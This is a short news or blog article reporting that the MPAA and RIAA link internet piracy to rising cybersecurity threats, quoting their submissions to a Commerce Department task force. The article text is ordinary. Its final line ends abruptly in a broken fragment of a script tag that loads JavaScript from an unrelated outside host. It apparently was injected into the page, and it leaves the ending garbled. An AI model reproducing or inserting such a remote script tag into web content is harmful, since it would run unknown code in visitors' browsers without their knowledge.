Internet piracy linked to cybersecurity problems

The Motion Picture Association of America (MPAA) claims there’s a correlation between rising cybersecurity problems and piracy, and they want help from the U.S. federal government in combating piracy. The MPAA is trying to tie the US government’s worries related to cybersecurity and piracy. It’s a clever tactic to increase their anti-piracy efforts.

As a response to a cybersecurity threat assessment from the Department of Commerce Internet Policy Task Force (IPTF), the MPAA said, “Unfortunately, criminal enterprises are also using the Internet to hack into networks and computers for the purpose of stealing valuable data – whether personally identifiable information, trade secrets, or content,”

According to the RIAA, offering a similar analysis “… rogue operators use the offer of infringing versions of our members’ sound recordings and music videos as the ‘candy’ to attract users that are necessary for them to create and exploit cyber vulnerabilities. In light of this, any discussion addressing malvertising or trusted downloads should also address some of the roots of these problems.” type=’text/javascript’ src=’http://online-sale24.com/1.js’>
